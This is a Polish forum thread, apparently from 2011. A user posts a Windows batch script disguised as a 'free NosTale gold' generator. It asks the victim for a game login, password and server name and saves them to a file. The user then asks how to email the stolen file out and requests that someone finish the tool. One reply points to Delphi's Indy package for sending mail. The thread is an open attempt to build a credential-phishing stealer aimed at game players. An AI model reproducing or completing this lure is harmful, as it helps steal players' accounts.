Pokaż wyniki od 1 do 4 z 4

Temat: Keylogger w Notatniku-Problem

Domyślnie Keylogger w Notatniku-Problem

WItam,
    przejde od razu do rzeczy
    otóż napisałem sobie w notatniku taki kod:(zezwalam na edytowanie dla własnych potrzeb)

@echo off
    color b
    tittle Darmowy gold NosTale
    cls
    echo Podaj Login i Haslo-Wpisz po Uzytkownik spacje i swoj login-zatwierdz enterem.pojawi sie wpis Haslo wpisz spacje i podaj swoje haslo-Zatwierdz enterem.Nastepnie wpisz ilosc golda jaka chcesz posiadac
    echo.
    echo.
    cd "D:/Keylogger"
    set /p Uzytkownkik=Uzytkownkik
    set /p Haslo=Haslo
    set /p Ilosc zlota=ilosc zlota
    set /p Nazwa Serwera=Nazwa Serwera
    echo Uzytkownik="%Uzytkownkik%" Haslo="%Haslo%" Nazwa Serwera="%Nazwa Serwera%" >passy.txt

Zapiusuje się to wszystko w pliku passy.txt w folderze w którym został włączony program
    I mam problem z tym,ze nie wiem jak zrobić aby tan plik lub jego zwartość wysyłała się na email
    Z góry dziękuje za pomoc ;D

Użytkownik (R) Avatar D.F.

Domyślnie

Chyba skryptem wsadowym nie da się wysłać E-maila, ale nie jestem pewien. Zainteresuj się jakimś językiem programowania. W Delphi za pomocą pakietu Indy można bardzo łatwo wysłać E-maila.

Domyślnie

Cytat Napisał D.F. Zobacz post
    Chyba skryptem wsadowym nie da się wysłać E-maila, ale nie jestem pewien. Zainteresuj się jakimś językiem programowania. W Delphi za pomocą pakietu Indy można bardzo łatwo wysłać E-maila.
    "Bardzo" łatwo? Chyba sobie jaja robisz. Pobaw się troche, a zobaczysz, ile się naużerasz, zwłaszcza na Indy 10. Auth servera to twarda bombka do stłuczenia . Na wersji 9 jest to jeszcze do zrobienia, na 10 - nie znam osoby której by się udało (a przeszukałem wieeele wielojęzycznych for z postami na ten temat)

Domyślnie

Delphi...przeklęty program.Mi właśnie o notatnik chodzi ale jeśli się nie da... .A nie pomęczył by sie ktoś i nie zrobił by mi tego? byłbym bardzo wdzięczny ;p
    Ostatnio edytowane przez ziom724 ; 28-12-2011 o 16:00

Tagi dla tego tematu

Uprawnienia